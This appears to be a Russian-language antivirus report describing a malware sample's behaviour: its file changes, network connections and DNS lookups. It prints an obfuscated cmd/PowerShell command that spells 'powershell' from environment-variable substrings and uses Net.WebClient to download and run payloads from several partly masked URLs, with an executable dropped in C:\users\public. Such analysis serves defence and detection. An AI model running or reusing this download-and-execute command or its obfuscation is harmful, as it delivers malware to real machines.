Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $etailers14='azure77';$Security67=new-object Net.WebClient;$Borders29='http://de###abiye.com/LrBN7ad@http://staff.pelfberry.com/bNRouz3@ht...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\851.exe
Удаляет следующие файлы
- C:\users\public\851.exe
Сетевая активность
Подключается к
- 'ma####k.ridvxn.site':80
- 'df####b1.onamae.com':80
UDP
- DNS ASK de###abiye.com
- DNS ASK st###.pelfberry.com
- DNS ASK ma####k.ridvxn.site
- DNS ASK df####b1.onamae.com
- DNS ASK le#######imi.theophraste.net
- DNS ASK aw###n-hda.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $etailers14='azure77';$Security67=new-object Net.WebClient;$Borders29='http://de###abiye.com/LrBN7ad@http://staff.pelfberry.com/bNRouz3@ht...' (со скрытым окном)
